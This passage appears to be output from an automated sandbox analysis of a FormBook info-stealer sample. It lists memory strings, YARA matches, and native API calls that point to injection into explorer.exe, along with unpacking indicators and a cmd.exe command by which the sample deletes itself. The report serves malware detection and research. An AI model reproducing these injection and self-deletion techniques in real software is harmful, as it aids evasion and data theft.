Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00419D60 NtCreateFile | 1_2_00419D60
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00419E10 NtReadFile | 1_2_00419E10
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00419E90 NtClose | 1_2_00419E90
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00419F40 NtAllocateVirtualMemory | 1_2_00419F40
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00419D5A NtCreateFile | 1_2_00419D5A
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00419E8A NtClose | 1_2_00419E8A
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00419F3A NtAllocateVirtualMemory | 1_2_00419F3A
          Source: C:\Windows\explorer.exe | Code function: 2_2_074BBA32 NtCreateFile | 2_2_074BBA32
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9540 NtReadFile,LdrInitializeThunk | 7_2_055C9540
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C95D0 NtClose,LdrInitializeThunk | 7_2_055C95D0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9710 NtQueryInformationToken,LdrInitializeThunk | 7_2_055C9710
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9FE0 NtCreateMutant,LdrInitializeThunk | 7_2_055C9FE0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9780 NtMapViewOfSection,LdrInitializeThunk | 7_2_055C9780
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9650 NtQueryValueKey,LdrInitializeThunk | 7_2_055C9650
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9660 NtAllocateVirtualMemory,LdrInitializeThunk | 7_2_055C9660
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C96D0 NtCreateKey,LdrInitializeThunk | 7_2_055C96D0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C96E0 NtFreeVirtualMemory,LdrInitializeThunk | 7_2_055C96E0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9910 NtAdjustPrivilegesToken,LdrInitializeThunk | 7_2_055C9910
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C99A0 NtCreateSection,LdrInitializeThunk | 7_2_055C99A0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9840 NtDelayExecution,LdrInitializeThunk | 7_2_055C9840
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9860 NtQuerySystemInformation,LdrInitializeThunk | 7_2_055C9860
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9A50 NtCreateFile,LdrInitializeThunk | 7_2_055C9A50
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9560 NtWriteFile | 7_2_055C9560
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055CAD30 NtSetContextThread | 7_2_055CAD30
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9520 NtWaitForSingleObject | 7_2_055C9520
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C95F0 NtQueryInformationFile | 7_2_055C95F0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055CA770 NtOpenThread | 7_2_055CA770
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9770 NtSetInformationFile | 7_2_055C9770
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9760 NtOpenProcess | 7_2_055C9760
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055CA710 NtOpenProcessToken | 7_2_055CA710
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9730 NtQueryVirtualMemory | 7_2_055C9730
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C97A0 NtUnmapViewOfSection | 7_2_055C97A0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9670 NtQueryInformationProcess | 7_2_055C9670
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9610 NtEnumerateValueKey | 7_2_055C9610
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9950 NtQueueApcThread | 7_2_055C9950
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C99D0 NtCreateProcessEx | 7_2_055C99D0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055CB040 NtSuspendThread | 7_2_055CB040
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9820 NtEnumerateKey | 7_2_055C9820
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C98F0 NtReadVirtualMemory | 7_2_055C98F0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C98A0 NtWriteVirtualMemory | 7_2_055C98A0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9B00 NtSetValueKey | 7_2_055C9B00
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055CA3B0 NtGetContextThread | 7_2_055CA3B0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9A10 NtQuerySection | 7_2_055C9A10
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9A00 NtProtectVirtualMemory | 7_2_055C9A00
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9A20 NtResumeThread | 7_2_055C9A20
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055C9A80 NtOpenDirectoryObject | 7_2_055C9A80
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B9D60 NtCreateFile | 7_2_010B9D60
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B9F40 NtAllocateVirtualMemory | 7_2_010B9F40
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B9E10 NtReadFile | 7_2_010B9E10
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B9E90 NtClose | 7_2_010B9E90
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B9D5A NtCreateFile | 7_2_010B9D5A
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B9F3A NtAllocateVirtualMemory | 7_2_010B9F3A
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B9E8A NtClose | 7_2_010B9E8A
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0558B150 appears 136 times
          Source: zHgm9k7WYU.exe | Binary or memory string: OriginalFilename vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000000.228278188.00000000005B2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.261046059.0000000005170000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.254306135.00000000029E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTypeLibImporterFlags.dll4 vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.261473078.00000000054D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe | Binary or memory string: OriginalFilename vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.290950231.0000000000ED2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.297873498.000000000396E000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe | Binary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: zHgm9k7WYU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/5
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zHgm9k7WYU.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: zHgm9k7WYU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknown | Process created: C:\Users\user\Desktop\zHgm9k7WYU.exe 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Process created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: zHgm9k7WYU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: zHgm9k7WYU.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: zHgm9k7WYU.exe | Static file information: File size 1081344 > 1048576
          Source: zHgm9k7WYU.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x107400
          Source: zHgm9k7WYU.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.574401869.000000000567F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe
          Source: Binary string: explorer.pdb source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Unpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Unpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 0_2_005B5DF5 push esp; iretd 0_2_005B5DFB
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 0_2_005B39AE push edi; retf 0_2_005B39AF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 0_2_057EC208 push eax; iretd 0_2_057EC209
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 0_2_057EA8EF push E802E15Eh; retf 0_2_057EA901
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00405906 push esp; iretd 1_2_0040590B
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00416BA6 pushfd ; iretd 1_2_00416BA7
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00417694 push esi; iretd 1_2_00417699
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00ED39AE push edi; retf 1_2_00ED39AF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00ED5DF5 push esp; iretd 1_2_00ED5DFB
          Source: C:\Windows\explorer.exe | Code function: 2_2_074BF3E6 pushad ; ret 2_2_074BF3E7
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_055DD0D1 push ecx; ret 7_2_055DD0E4
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010A5906 push esp; iretd 7_2_010A590B
